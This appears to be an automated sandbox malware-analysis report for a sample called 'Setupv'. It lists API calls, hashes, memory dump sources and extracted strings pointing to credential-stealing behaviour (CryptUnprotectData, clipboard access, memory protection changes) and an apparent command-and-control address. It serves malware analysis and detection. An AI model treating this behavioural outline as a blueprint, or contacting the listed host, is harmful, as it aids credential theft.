• Instruction ID: b6751da12871d4bec5c93deb21959c7102be29470f7f85aa7ffeedcb9ce2e2e5
• Opcode Fuzzy Hash: 1e92b9a4d51e715f02dfb213b6aa7335232b28630e84769a0df4d05c0d73a66e
• Instruction Fuzzy Hash: C4D193B554D7618BC324AF38C4812AEBBE6AFD8314F05DE2DE8DA87381DB348545CB46

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0273075F,?,00000001,?,81EC8B55,000000FF), ref: 02730C57
• Thread32First.KERNEL32(00000000,0000001C), ref: 02730C83
• Wow64SuspendThread.KERNEL32(00000000), ref: 02730CD6
• CloseHandle.KERNEL32(00000000), ref: 02730D00
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
• String ID:
• API String ID: 1849706056-0
• Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction ID: ee676daa9919ab09ee95e04dff29f1760e07e5d6266028d70fa5c7effecad52c
• Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70410A71A00108AFDB18DFA9C891BADB7F6EF88300F10C168E6159B795DB35AE45CB94

Control-flow Graph
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 027307AC
• TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02730AA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID: CreateProcessTerminateThread
• String ID: Q#
• API String ID: 1197810419-665244491
• Opcode ID: 20408b49deccceb8f3f2607aff62e658c62c3cff53805367a480f9a57cc2b03a
• Instruction ID: b658b58706a73f67995f8b64c53752e3ca7756e66d7c80f6ce585f1ac9b383b9
• Opcode Fuzzy Hash: 20408b49deccceb8f3f2607aff62e658c62c3cff53805367a480f9a57cc2b03a
• Instruction Fuzzy Hash: D312C0B0E00219DFDB15CF98D991BADBBB2FF48304F2482A9D515AB386C735AA41CF54
APIs
• GetCurrentProcessId.KERNEL32 ref: 02E1B7E4
• GetCurrentThreadId.KERNEL32 ref: 02E1B7EE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02E1B89E
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: Current$FolderPathProcessSpecialThread
• String ID:
• API String ID: 2640001496-0
• Opcode ID: 543370e9da35ec513a21613d55092b711b0c14ce2c3a8b74925d0fff6e2ef461
• Instruction ID: 64283d71102c3d0ea1eb7fa97b3fb281c9684e7bc5be00ef6e34edd4d267f74f
• Opcode Fuzzy Hash: 543370e9da35ec513a21613d55092b711b0c14ce2c3a8b74925d0fff6e2ef461
• Instruction Fuzzy Hash: 7F91D477B847114FD308DE29CC9235AB6D7ABC8714F09D43DE889D7395EA38DC458A81
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: 8$toptalentw.top/qena$ac
• API String ID: 0-3223457869
• Opcode ID: 0fe3c5a6f2c3985ab65717ac39b716d01d7ed81a7cdc6c28a1ebaf85b5f63eca
• Instruction ID: 7682996425b3082ed021691117518c865d1a2a32a6dfc74faa8d84cfabcab80a
• Opcode Fuzzy Hash: 0fe3c5a6f2c3985ab65717ac39b716d01d7ed81a7cdc6c28a1ebaf85b5f63eca
• Instruction Fuzzy Hash: 4B125672A983508FD314CF29D8556ABBBE2BBC1314F08D97DF8998B351DB708885CB52

Control-flow Graph: function at 2730ac9-2730c0b, calls GetPEB and CreateThread (graph image and executed/not-executed legend not reproduced)
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02730B95
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                          • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                          • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                          • Instruction ID: 46f0b82d7a23d3ddcaba146e6aee875310b6fa05235aa11a389a1a30d7dbe945
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8441A474A00209EFDB14CF98C994BAEB7B1FF88318F208598D515AB391D775AE81CF94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00BA0792
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 2706961497-2766056989
                                                                                                                                                                                                                          • Opcode ID: 6fc9c57550b909a1d670a4aba9240b9ab9b539ccd3cf5fce8b7c1e3a4c4e1d70
                                                                                                                                                                                                                          • Instruction ID: 504956d1c6923e5b14d24976dfb6abf2238ed143a807b410d5244887e4631139
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fc9c57550b909a1d670a4aba9240b9ab9b539ccd3cf5fce8b7c1e3a4c4e1d70
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC4126B0A1821A8BEB10DF59C8857AEB7F1FB85304F2485A5D425E7380E378EE55DF81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL ref: 00BA0DA0
                                                                                                                                                                                                                          • NtFreeVirtualMemory.NTDLL ref: 00BA0F55
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryVirtual$AllocateFree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 292159236-0
                                                                                                                                                                                                                          • Opcode ID: fdcd9481dd92780094e8dcbedfd057ca5f8d098582d8ea202342eb96a1c60491
                                                                                                                                                                                                                          • Instruction ID: f6417be1233139c3156799d47c9b65add9f058a7aff7a207f97835063ccae381
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdcd9481dd92780094e8dcbedfd057ca5f8d098582d8ea202342eb96a1c60491
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 608192B4D182099FDB10EFA9C1847AEBBF0EF45304F10C969E894A7380E7799945DF92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$a+<Z
                                                                                                                                                                                                                          • API String ID: 0-4196300823
                                                                                                                                                                                                                          • Opcode ID: 6a7255fcdcbc1fd7c6612f720e64b1f3d4e7d05573a9353ad482d2c00b7ee2b8
                                                                                                                                                                                                                          • Instruction ID: a32f83c84d465ab446a060950b980a426514d4fb9bef35b6535842fff7485f04
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a7255fcdcbc1fd7c6612f720e64b1f3d4e7d05573a9353ad482d2c00b7ee2b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E615D76F902104BC7249B248CD07BF73A3EFC5708F09A53CF44A5B342DE78A9168692
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: InitializeThunk
• String ID: HIJK
• API String ID: 2994545307-3946259990
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02E2CEE0
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02E2AEF0
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: InitializeThunk
• String ID: HIJK
• API String ID: 2994545307-3946259990

Control-flow Graph
control_flow_graph 103 2731f13-2731f5d NtAllocateVirtualMemory 104 2731f62-2731f65 103->104 105 2731f5f 103->105 105->104
APIs
• NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,027317B8), ref: 02731F53
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0

Control-flow Graph
control_flow_graph 106 2731fa4-2731fe8 NtProtectVirtualMemory
APIs
• NtProtectVirtualMemory.NTDLL ref: 02731FDC
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0

Control-flow Graph
control_flow_graph 107 2731f66-2731fa3 NtFreeVirtualMemory
APIs
Memory Dump Source
• Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
Similarity
• API ID: FreeMemoryVirtual
• String ID:
• API String ID: 3963845541-0
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02E2D097
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(02E5C9F5,75E10000,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 02E57C06
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 206942d54d9deabbe1c5a56ac1790a9d367dccf5c64ac69c9dfc2e5b1dec7064
                                                                                                                                                                                                                          • Instruction ID: c4a499aa5db74637f5108a5eea374eb221324e7f2d70c18a5f8eca3ad050637a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 206942d54d9deabbe1c5a56ac1790a9d367dccf5c64ac69c9dfc2e5b1dec7064
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE02D71908216EF9E04CF45C24484EFBE5AB84758F158C8DA488B7210C3B0AD4AEB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH
                                                                                                                                                                                                                          • API String ID: 0-170685188
                                                                                                                                                                                                                          • Opcode ID: 8ace602b8c6a7fb48209ce8f062dd785943e8523b2283aa17eebba098ecac0be
                                                                                                                                                                                                                          • Instruction ID: 367e024d76d36f338b3235d034f5d62cb9282077ebdf9f2cc317abfb60021696
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ace602b8c6a7fb48209ce8f062dd785943e8523b2283aa17eebba098ecac0be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B071DF76A583608FD330CF68C9907DAB7E1FBC4708F056A1DE48DDB241D7B898488B92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                          • Opcode ID: 73b51c8bb16dd0061a5c65b2e9f673967572831dfe1feb9312e74e16a250b159
                                                                                                                                                                                                                          • Instruction ID: 6976af39c14324dbc5a64f2cf25670c41b7c7a00727af5dcf477bad82a76ce08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73b51c8bb16dd0061a5c65b2e9f673967572831dfe1feb9312e74e16a250b159
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F21EE71899360ABD314CF49C88066BF7E5EFC9728F14991DECD467250C374AC448BA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e83c270595c490937078877d23dacbf5d841c00e405f67ec790e7fffc29c0d33
                                                                                                                                                                                                                          • Instruction ID: f56e2cc552f6d570fe8e7ccc77fe7fd3c841c74f2f7c08adcf785d5a4a27b525
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e83c270595c490937078877d23dacbf5d841c00e405f67ec790e7fffc29c0d33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D17972A883108FD316CE288C546ABB7E2EFC6319F09DA2DD8D997345E374D801C792
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d9a27eae20fe0425396c4ea8e3999cfc1be7e5381ccc90d56f2ee0e8158c26ec
                                                                                                                                                                                                                          • Instruction ID: e028ba343ae2d7cdf82a9bbe28411a8d2ff768c601443c20856e5b721be95756
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9a27eae20fe0425396c4ea8e3999cfc1be7e5381ccc90d56f2ee0e8158c26ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7281A772BD83208FD728DE68D88072BB3D2ABC5318F19C52DDD855B392E7759C828791
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6b80b3b6d91d0fd193a8b681c1c04bfd868b6a8fcca00c5b949627a76fa1b91c
                                                                                                                                                                                                                          • Instruction ID: 9925a3fee4b38c7a4fb479399ae184448cf93cd75395fd88be30536d71b07f30
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b80b3b6d91d0fd193a8b681c1c04bfd868b6a8fcca00c5b949627a76fa1b91c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8091F4766807118BD7248F28C89176273E3FF9932CF19965DD8A78B3A1E335A809CB40
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b4909e4ccc5f53baf10a47dd25461e878d466414a23362f7e1bd931339d9774f
                                                                                                                                                                                                                          • Instruction ID: ea0aa16a10d72bff7eef14ea13665ece041d35079e64c22086bd6118745c6369
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4909e4ccc5f53baf10a47dd25461e878d466414a23362f7e1bd931339d9774f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B4127307D83606BE3289A298C50B2BBBD39FC8758F24D81CE895D7291C774D8828B65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 65fdfa40a41649d29dbcc12e5f31aad205f1b9da90a4d555d45df0711392b113
                                                                                                                                                                                                                          • Instruction ID: 870ed58ede2547885aaa3f7ae1b59cdf01deefd91d0146040e745aa19a759ca9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65fdfa40a41649d29dbcc12e5f31aad205f1b9da90a4d555d45df0711392b113
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074167B95183809BE768DF66E855BABBAE2FBC5244F949D1CD4C8AB344DB308045CB13
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                          • Opcode ID: 0f8eb1b02dcac5d20f4e2f5630590db36448e49fcf5e73f1774963130d86fabc
                                                                                                                                                                                                                          • Instruction ID: 413b60094d856d10e3287b62ff6430ede69c0e841c66c782dcf6bf6c940ed9cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f8eb1b02dcac5d20f4e2f5630590db36448e49fcf5e73f1774963130d86fabc
• Instruction Fuzzy Hash: 6E41AAB49443599FDB00EF68C99879EBBF0FF45314F0085A9E854AB340E3759A84CF95

Memory Dump Source
• Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b474b0f1e3aae90d1c1f35aede222e0c13cc140969cb3bd75f15b6981ee04c14
• Instruction ID: bde4745a7d86b75536bc2fc5b6027f043eacde08a94d426715e1751da4c20321
• Opcode Fuzzy Hash: b474b0f1e3aae90d1c1f35aede222e0c13cc140969cb3bd75f15b6981ee04c14
• Instruction Fuzzy Hash: 4EF0BDB09083199BDB40AFA9D54975DBBF4EB05308F008858E950AB341E3B595848B52

Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4096458114261ea1f6749e323ccb0c6dfc934ba05f3675cebd11a4e33b0ee6bf
• Instruction ID: 1b66fb67830ed3a167e17eb8f6bc645fb5aadbf03634aae5f2c08b4224bebe46
• Opcode Fuzzy Hash: 4096458114261ea1f6749e323ccb0c6dfc934ba05f3675cebd11a4e33b0ee6bf
• Instruction Fuzzy Hash: 85E04F706543419FD7188E35DC14BBBB3B9EB8A300F445A5CB946D31C0DB32AC508A54

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: Object$DeleteSelect
• String ID:
• API String ID: 618127014-3916222277
• Opcode ID: 226afa26aceebc261228800027b0b2461a7c55b4b24dbd8d54aa4ebf5a4d6053
• Instruction ID: 0f8c3ae6777ea6a2bc90e1cb725dec859cedcd4846d221fcea1a5a417ae18766
• Opcode Fuzzy Hash: 226afa26aceebc261228800027b0b2461a7c55b4b24dbd8d54aa4ebf5a4d6053
• Instruction Fuzzy Hash: 4D61A1B0598380CBD320EF69D64979FBBE0BB85344F50992DE9889B250D7749898CF86

APIs
Memory Dump Source
• Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 7bd0af22782f5c8a35ba0121cc4a7b8a089474b53753b6665cdd4ac5bf2ef12f
• Instruction ID: 2ded62a428d18afd3ea696034623d81d51ca596c1cdbf2c6e0b7585f8bfff734
• Opcode Fuzzy Hash: 7bd0af22782f5c8a35ba0121cc4a7b8a089474b53753b6665cdd4ac5bf2ef12f
• Instruction Fuzzy Hash: 42316FB490831ACFCB50DF9CC585A9EBBF0FB49314F108969E868A7350D3749985CF62

APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02E216E9
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 0d1f94dc5161434ea110c0f12c950368998807c6b24d44ab5b6a9b0928f4d5c1
• Instruction ID: b82a824dee8b1063c8e22ba2958957e214ecb925434dd0ebc17a407727d9b623
• Opcode Fuzzy Hash: 0d1f94dc5161434ea110c0f12c950368998807c6b24d44ab5b6a9b0928f4d5c1
• Instruction Fuzzy Hash: AED092307D8328B6F1B02A09AC0BF0832A46303F32FB00B01F328BC0C08AE071618A1D

APIs
• CoInitialize.OLE32(00000000), ref: 02E220DB
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: c2434f00979c665c89a54391bbed84d7ce2f4675a98d61954539fda2d9c8a86a
• Instruction ID: a9e67e3a94c3b46f428f0e56dfb13ea88f97167b801e35f7414f40d384420aa2
• Opcode Fuzzy Hash: c2434f00979c665c89a54391bbed84d7ce2f4675a98d61954539fda2d9c8a86a
• Instruction Fuzzy Hash: F1A001309F8264CAE3592A5AA41970A3664BB53742F800959E24588481DA6150B1DB62

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: E2G$ i"k$ i"k$#U?W$%eVg$%eVg$0P$4IK$5u8w$5u8w$6Y>[$:yH{$:yH{$<M:O$<M:O$>q=s$>q=s$@5A7$@5H7$AB$AB$C-H/$G1I3$G1I3$PaSc$PaSc$W@$X=i?$X=i?$]!Q#$]!Q#$]%R'$_)T+$_m,o$_m,o$aQ.S$aQ.S$eUgW$eUgW$ho!$ho!$iYi[$iYi[$|-\/$Y_
• API String ID: 0-2628018768
• Opcode ID: dedd91872e8c970cea4ec13bea0bb14fb09e4a252054f7e25504129936c2bc0e
• Instruction ID: 05940069cbbec92d37fe4d7135187c2e2acbdb7ddc5613da623c471ed60eb823
• Opcode Fuzzy Hash: dedd91872e8c970cea4ec13bea0bb14fb09e4a252054f7e25504129936c2bc0e
• Instruction Fuzzy Hash: 90B273B4A107568FD708CF16D884699BBB1FF45348F298AACC4995F756CB719882CF80

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock
• String ID: ($.$/$3$4$6$9$:$;$K
• API String ID: 1006321803-92690712
• Opcode ID: 32678ae02ba6db916ad4ab09d216c0db73b9bddd0e8b9a2681d06b921df1debc
• Instruction ID: 4bdd6d1ebf8db6104e337549bcc706c1ca0dc7994c384ea3e83aad3eb8207dd0
